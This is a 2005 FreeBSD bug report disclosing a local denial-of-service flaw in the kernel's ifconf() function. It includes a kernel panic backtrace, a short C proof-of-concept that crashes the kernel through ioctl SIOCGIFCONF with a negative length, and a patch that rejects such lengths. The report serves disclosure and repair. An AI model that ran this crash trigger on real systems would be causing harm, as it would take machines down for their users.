kern/77424: [PATCH] Local DoS from user-space in ifconf()

Sat Feb 12 10:30:21 PST 2005

>Number:         77424
>Category:       kern
>Synopsis:       [PATCH] Local DoS from user-space in ifconf()
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    freebsd-bugs
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Sat Feb 12 18:30:20 GMT 2005
>Closed-Date:
>Last-Modified:
>Originator:     Wojciech A. Koszek
>Release:        FreeBSD 5.3-STABLE i386
>Organization:
>Environment:
System: FreeBSD dunstan.freebsd.czest.pl 5.3-STABLE FreeBSD 5.3-STABLE #0: Sat Feb 12 11:15:23 CET 2005 root at dunstan.freebsd.czest.pl:/usr/obj/usr/src/sys/HOME6 i386

--
kern.ostype: FreeBSD
kern.osrelease: 5.3-STABLE
kern.osrevision: 199506
kern.version: FreeBSD 5.3-STABLE #0: Sat Feb 12 11:15:23 CET 2005
   root at dunstan.freebsd.czest.pl:/usr/obj/usr/src/sys/HOME6
--
kern.ostype: FreeBSD
kern.osrelease: 6.0-CURRENT
kern.osrevision: 199506
kern.version: FreeBSD 6.0-CURRENT #2: Sat Feb 12 10:43:18 UTC 2005
    root@:/usr/obj/usr/src/sys/GENERIC
--
>Description:
Bug exists in /usr/src/sys/net/if.c, function ifconf(), because only
partial validity check is done on data passed from user-space. This lets
every user to cause kernel panic by supplying maliciuos values (ifc_len
from ifconf structure to numbers < 0) and calling ioctl with SIOCGIFCONF
argument:

panic: wrote past end of sbuf (0 >= 0)
KDB: stack backtrace:
panic(c0663212,0,0,d94b0bd8,c04f6a8f) at panic+0xeb
_assert_sbuf_integrity(c1a2a4a0,c1a2a400,c1bfb2e0,d94b0c34,c053dc99) at _assert_
sbuf_integrity+0x3b
sbuf_bcat(c1bfb2e0,d94b0c08,10,1,0) at sbuf_bcat+0x1b
ifconf(c1c86dec,c0086924,d94b0c60,c1bd1780,c1bd1780) at ifconf+0x129
ioctl(c1bd1780,d94b0d14,3,0,292) at ioctl+0x11e
syscall(2f,2f,2f,0,bfbfecc8) at syscall+0x128
Xint0x80_syscall() at Xint0x80_syscall+0x1f

--- syscall (54, FreeBSD ELF32, ioctl), eip = 0x8048517, esp = 0xbfbfe81c, ebp =
 0xbfbfec78 ---
Uptime: 4m38s
>How-To-Repeat:
Attached code [ifconftest.c] should panic your kernel:

$ gcc ifconftest.c -o ifconftest
$ ./ifconftest

>Fix:
Attached patch [diff.0.if.c] corrects this problem (-STABLE and -CURRENT).
Patch should be tested.

--- ifconftest.c begins here ---
#include <sys/param.h>
#include <sys/socket.h>
#include <sys/errno.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>

int
main ()
{
	struct ifreq iq;
	struct ifconf ic;
	int s, error = 0;
	char buf[1024];
	
	s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s == -1)
		exit(1);
	bzero(&iq, sizeof(iq));
	bzero(&ic, sizeof(ic));

	strncpy(iq.ifr_name, "lo0", sizeof(iq.ifr_name));

	ic.ifc_len = -100;
	ic.ifc_buf = buf;
	error = ioctl(s, SIOCGIFCONF, (caddr_t) &ic);
	if (error)
		errx(1, "%s[%d]\n", strerror(errno), errno);
	printf("%s\n", buf);
	exit(0);
}
--- ifconftest.c ends here ---

--- diff.0.if.c begins here ---
Fixes leak in ifconf() when ioctl(2) is called with SIOCGIFCONF and length
of request equal to -1

diff -upr /usr/src/sys/net/if.c src/sys/net/if.c
--- /usr/src/sys/net/if.c	Thu Nov 11 12:34:14 2004
+++ src/sys/net/if.c	Sun Nov 21 00:42:56 2004
@@ -1508,6 +1508,8 @@ ifconf(u_long cmd, caddr_t data)
 	max_len = MAXPHYS - 1;
 
 again:
+	if (ifc->ifc_len <= 0)
+		return (EINVAL);
 	if (ifc->ifc_len <= max_len) {
 		max_len = ifc->ifc_len;
 		full = 1;
--- diff.0.if.c ends here ---

>Release-Note:
>Audit-Trail:
>Unformatted:
 	critical
 	medium
